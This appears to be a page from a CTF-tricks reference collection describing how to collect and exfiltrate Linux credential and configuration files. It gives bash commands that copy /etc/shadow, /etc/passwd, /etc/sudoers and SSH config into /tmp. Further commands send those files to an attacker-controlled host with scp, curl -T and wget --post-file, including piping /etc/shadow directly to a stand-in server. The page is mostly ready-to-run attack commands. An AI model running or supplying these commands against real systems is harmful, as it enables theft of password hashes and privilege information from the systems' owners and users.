> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-4/linux/scp/trick-0264.md).

# Collect and Exfiltrate System Files via SCP

***

Collect sensitive system files such as user accounts (`passwd`), encrypted passwords and related information (`shadow`), permissions controlling who can run commands as root (`sudoers`), and SSH configuration (`~/.ssh/config`). These are often staged in a temporary location before exfiltration.

```bash
cat /etc/sudoers > /tmp/sudoers.txt
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
cat ~/.ssh/config > /tmp/sshconfig.txt
```

Use `scp` to securely transfer these files to a remote attacker-controlled server. This typically requires read access to the source files (often root) and authentication to the destination server. `scp` is a legitimate tool used for transferring files between systems and requires SSH access.

```bash
scp /tmp/passwd.txt /tmp/sudoers.txt /tmp/shadow.txt /tmp/sshconfig.txt <attacker_server>:/path/
```

Alternatively, other legitimate binaries like `curl` and `wget` can be used to exfiltrate data. These tools can be used to upload the staged files or even directly pipe the file contents.

Exfiltrating staged files using `curl` or `wget`:

```bash
curl -T /tmp/passwd.txt http://attacker.com/upload/
wget --post-file=/tmp/passwd.txt http://attacker.com/upload/
```

Exfiltrating file contents directly by piping to `curl` or `wget`:

```bash
cat /etc/passwd | curl <attacker_server>/upload -T -
cat /etc/shadow | wget --post-file=- <attacker_server>/upload
```
